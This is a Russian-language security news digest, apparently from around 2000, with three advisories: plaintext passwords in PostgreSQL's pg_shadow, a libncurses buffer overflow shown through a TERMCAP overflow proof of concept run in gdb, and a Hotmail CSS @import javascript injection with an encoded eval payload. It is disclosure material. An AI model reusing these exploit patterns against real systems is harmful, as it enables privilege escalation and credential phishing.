|
POSTGRESQL хранит пароли открытым текстом
Team Void
При переводе баз данных на другой сервер Robert van der Meulen /rvdm@CISTRON.NL/ обнаружил следующую проблему в методе, которым postgresql сохраняет пользовательские пароли:
box:/var/postgres/data# strings pg_shadow.
someaccountname
someaccountpasswd
someaccountname
someaccountpasswd
Пароли и имена пользователей сохраняются открытым текстом в файле pg_shadow. Данные файлы имеют владельцем пользователя postgres, и могут быть прочтены только им. Модифицирование данных файлов осуществляется через pgsql, защищённый паролем. Получение uid postgres, естественно, позволяет обойти механизм защиты паролями баз данных. Уязвимости подвержены версии 6.3.2 и 6.5.3.
ПЕРЕПОЛНЕНИЕ БУФФЕРА В libncurses.
Суидные программы, собранные с libncurses, подвержены переполнению буффера, что является общеизвестной ситуацией и может легко привести к захвату прав суперпользователя. Демонстрацмонный эксплоит прилагается:
lubi:venglin:~> cat tescik.c
#include
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Проблема присутствует в 3.4-STABLE, и ликвидирована в 4.0-STABLE и 5.0-CURRENT
ОЧЕРЕДНЫЕ ПРОБЛЕМЫ HOTMAIL И JAVASCRIPT
Джорж Гусински обнаружил очередную брешь в защите сервиса hotmail от вставки javascript в письма. При использовании в теле письма конструкций вида "@import url(http://host/hostile.css)" возможно подшить к письму свой стайл, в котором будет прописана последовательность команд Javascript, при помощи которой можно, например, перенаправить пользователя на подложную страницу входа на hotmail, и снять его логин/пароль.
Данный код требуется вставить в HTML-сообщение:
А style.css, расположенный на host.dom, имеет следующее содержание:
@import url(javascript:alert('JavaScript is executed'));
@import
url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,
39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,
101,115,116,32,50,39,41,59)));
От проблемы можно изббавиться, прекратив использование браузера Microsoft Internet Explorer.
duke.
|